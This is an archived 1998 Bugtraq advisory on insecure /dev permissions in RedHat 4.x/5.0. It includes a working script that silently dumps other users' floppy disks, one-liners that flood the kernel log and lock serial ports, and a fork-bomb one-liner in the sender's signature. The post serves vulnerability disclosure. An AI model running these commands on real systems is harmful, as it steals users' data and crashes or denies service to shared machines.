X-RDate: Thu, 05 Feb 1998 12:17:24 +0500 (ESK)
Date: Wed, 4 Feb 1998 09:45:37 +0100
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: RedHat 4.x/5.0 /dev permissions
First one
----------
Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':
-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
sleep 1
if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
if [ "$DUMPED" = "0" ]; then
echo "Dumping image #$LABEL..."
cat $DUMP_DEV >.fdimage$LABEL
let LABEL=LABEL+1
DUMPED=1
fi
else
DUMPED=0
fi
done
-- eof --
Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):
[user@host sth]$ while :; do cat /dev/fd0H1440;done &
It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.
Second one
-----------
(not tested with rh 5.0)
Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:
[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy
Now serial port is in unusable state.
That's all?
------------
There are also a lot of other, not-so-common devices, eg. /dev/sequencer,
which are world-readable or even world-writable.
There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.
Solution...
------------
ls -l /dev/* | grep "r-- "
chmod ;)
_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
